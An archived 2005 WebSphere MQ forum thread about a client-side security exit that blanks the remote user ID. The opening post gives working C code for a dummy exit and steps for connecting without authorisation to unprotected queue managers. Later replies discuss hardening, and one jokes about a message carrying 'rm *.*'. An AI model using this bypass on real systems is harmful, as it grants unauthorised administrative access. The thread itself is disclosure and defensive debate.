| |
|
RSS Feed - WebSphere MQ Support
|
RSS Feed - Message Broker Support
|
  |
|
| New MQ Security Hole Found |
« View previous topic :: View next topic » |
| Author |
Message
|
| RogerLacroix |
 Posted: Tue Apr 26, 2005 9:07 pm Post subject: New MQ Security Hole Found |
 |
|
Jedi Knight
Joined: 15 May 2001
Posts: 3254
Location: London, ON Canada
|
All,
Drum roll please..................................!.!.!.!
While doing some extensive and weird testing for my new security solutions, I discovered a new security hole and it goes like this:
For programs written using C/C++, COBOL, Visual Basic (VB), etc. having it invoke a simple dummy client-side security exit (no code other than a ‘return’) will cause the client-side MCA to set the RemoteUserID to blank!!!
Go ahead and say 'so what'!
Ok, since you asked, he's a perfect use for this security hole. Lets say you have WMQ Server v5.3 installed on your PC but your UserID is NOT in any 'mqm' group on the OS/400 / Unix / Linux / Windows Server boxes. Hence, you cannot use your MQ Explorer. Right!!!
So, compile my sample dummy security exit, then open MQ Explorer and right-click on 'WebSphere MQ', and select Properties. In the 'Security Exit Name' field put the path & filename of the dummy security exit. i.e. C:\temp\mq\dummy(SE)
Now close and re-open MQ Explorer, point to any queue manager in your environment that does not use some sort of protection and viola, you are in (using a blank UserID)!!!!!!!!!!!!!!!!!!!
Oh, this will work with any program. i.e. MO71 - it allows you to connect to a mainframe (z/OS)!!!
| Code: |
/**
* dummy client-side security exit
*/
#include <stdio.h>
#include <stdlib.h>
#include <cmqc.h> /* MQI */
#include <cmqxc.h> /* */
/*
* Unix dummy function used as entry point to exit
*/
extern void MQENTRY MQStart(void) {;}
#if defined (WIN32)
__declspec (dllexport) void MQENTRY SE (PMQCXP pChannelExitParms,
PMQCD pChannelDefinition,
PMQLONG pDataLength,
PMQLONG pAgentBufferLength,
PMQBYTE pAgentBuffer,
PMQLONG pExitBufferLength,
PMQPTR pExitBufferAddr);
#endif
extern void MQENTRY SE(PMQCXP pChannelExitParms,
PMQCD pChannelDefinition,
PMQLONG pDataLength,
PMQLONG pAgentBufferLength,
PMQBYTE pAgentBuffer,
PMQLONG pExitBufferLength,
PMQPTR pExitBufferAddr)
{
pExitBufferAddr = pExitBufferAddr;
pExitBufferLength = pExitBufferLength;
/*
* check if security exit has been invoked
*/
if(pChannelExitParms->ExitId != MQXT_CHANNEL_SEC_EXIT)
{
pChannelExitParms->ExitResponse = MQXCC_SUPPRESS_FUNCTION;
return; /* hard exit!! */
}
else
{
/* switch on ExitReason to see why exit was invoked */
switch(pChannelExitParms->ExitReason)
{
case MQXR_INIT: /* Initialization */
case MQXR_TERM: /* Termination */
case MQXR_INIT_SEC: /* Initiate security exchange */
case MQXR_SEC_MSG: /* Security message */
{
pChannelExitParms->ExitResponse = MQXCC_OK;
break;
}
/*
* Unsupported exit reason - abort security exchange
*/
default:
{
pChannelExitParms->ExitResponse = MQXCC_SUPPRESS_FUNCTION;
break;
}
} /* switch - ExitReason */
}
return;
} |
Go ahead, be an MQAdmin today.  
Regards,
Roger Lacroix
Capitalware Inc.
_________________
Capitalware: Transforming tomorrow into today.
Connected to MQ!
Twitter |
|
| Back to top |
|
 |
| bduncan |
| Posted: Tue Apr 26, 2005 11:21 pm Post subject: |
|
|
Padawan
Joined: 11 Apr 2001
Posts: 1554
Location: Silicon Valley
|
And have you contacted IBM about this? And if so, have they completely ignored you? (in other words, adopted the Microsoft security hole model?)
_________________
Brandon Duncan
IBM Certified MQSeries Specialist
MQSeries.net forum moderator |
|
| Back to top |
|
|
| oz1ccg |
| Posted: Wed Apr 27, 2005 12:01 am Post subject: |
|
|
Yatiri
Joined: 10 Feb 2002
Posts: 628
Location: Denmark
|
Roger,
don't you read the Intercommunications manual ? 
This part was found in the MQCD part explaining the RemoteUserIdentifier parameter:
| Quote: |
The remote user identifier is relevant only for channels with a ChannelType of MQCHT_CLNTCONN or MQCHT_SVRCONN.
- For a security exit on an MQCHT_CLNTCONN channel, this is a user identifier that has been obtained from the environment (from an environment variable on OS/2 or from the system on UNIX platforms and Windows.) The exit can choose to send it to the security exit at the server.
- For a security exit on an MQCHT_SVRCONN channel, this field may contain a user identifier which has been obtained from the environment at the client, if there is no client security exit. The exit may validate this user ID (possibly in conjunction with the password in RemotePassword ) and update the value in MCAUserIdentifier. |
It's the responsibility of the client exit to provide the correct information, this is why Exits normally works in pairs.....
And this is one of the reasons why BlockMqmUsers was added to BlockIP2 way back in time....
And now everybody can penetrate every non protected WebSphere MQ environment just by using this piece of code, Great!
BTW: Long time ago (when I started with MQ), somebody raised a complaint to IBM: Please open the SYSTEM.DEF.SVRCONN, because at first time the MCAUSER was set to something like NoBody....
I just have to say: IT WORKS AS DESIGNED
Just my $0.02 
_________________
Regards, Jørgen
Home of BlockIP2, the last free MQ Security exit ver. 3.00
Cert. on WMQ, WBIMB, SWIFT. |
|
| Back to top |
|
|
| jefflowrey |
| Posted: Wed Apr 27, 2005 3:13 am Post subject: |
|
|
Grand Poobah
Joined: 16 Oct 2002
Posts: 19981
|
Should I post the code to create an MQTMC2 message that contains "rm *.*"?
_________________
I am *not* the model of the modern major general. |
|
| Back to top |
|
|
| RogerLacroix |
| Posted: Wed Apr 27, 2005 8:16 am Post subject: |
|
|
Jedi Knight
Joined: 15 May 2001
Posts: 3254
Location: London, ON Canada
|
Hi,
| Quote: |
| don't you read the Intercommunications manual ? |
Yes, you have listed a piece of the manual but it does NOT say anything about the MCA not filling in the RemoteUserIdentifier value if a client-side security exit is defined.
Funny that when there is no client-side security exit that the client-side MCA fills in the MQCD fields of:
- QMgrName
- ChannelName
- ConnectionName
- RemoteUserIdentifier
- etc...
But when define a client-side security exit then the MCA fills in all of the same fields but EXCLUDES the RemoteUserIdentifier field.
It says "The exit can choose to send it to the security exit at the server."
Therefore, I read that as it was filled in and the client-side security exit can choose to remove it (blank it out) or set it to something else!!! The client-side security exit did not alter it, therefore, as per the manual, RemoteUserIdentifier should have contained my UserID.
| Quote: |
| So To me it seems like it works as designed.... |
I still beg to differ. But 'it works as designed' does not mean it is not a security risk!!
Regards,
Roger Lacroix
Capitalware Inc.
_________________
Capitalware: Transforming tomorrow into today.
Connected to MQ!
Twitter |
|
| Back to top |
|
|
| oz1ccg |
| Posted: Wed Apr 27, 2005 3:10 pm Post subject: |
|
|
Yatiri
Joined: 10 Feb 2002
Posts: 628
Location: Denmark
|
Well, security risk......
I'll agree on it's not crystal clear written, but still every WMQ system administrator should know how to protect their system. And allways check the passed userid.... and refuse illegale ones, or even better do authentication.
This small snip is comming from the security book:
Chapter: Setting up WebSphere MQ client security
| Quote: |
If any server-connection channel definitions exist that have the MCAUSER attribute set to blank, clients can use this channel definition to connect to the queue manager with access authority determined by the user ID supplied by the client.
This might be a security exposure if the system on which the queue manager is running allows unauthorized network connections. The WebSphere MQ default server-connection channel (SYSTEM.DEF.SVRCONN) has the MCAUSER attribute set to blank.
To prevent unauthorized access, update the MCAUSER attribute of the default definition with a user ID that has no access to WebSphere MQ objects. |
There are more exposures.... some even better hidden....
Some great folks did a good job some time ago, a Redbook: WebSphere MQ Security in an Enterprise.
One thing is 100% shure: every queuemenager with "open" SVRCONNs needs security exits and/or SSL requirements.
Just my $0.02
_________________
Regards, Jørgen
Home of BlockIP2, the last free MQ Security exit ver. 3.00
Cert. on WMQ, WBIMB, SWIFT. |
|
| Back to top |
|
|
|
|
|
| |
|
Page 1 of 1 |
|
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
|
|
|
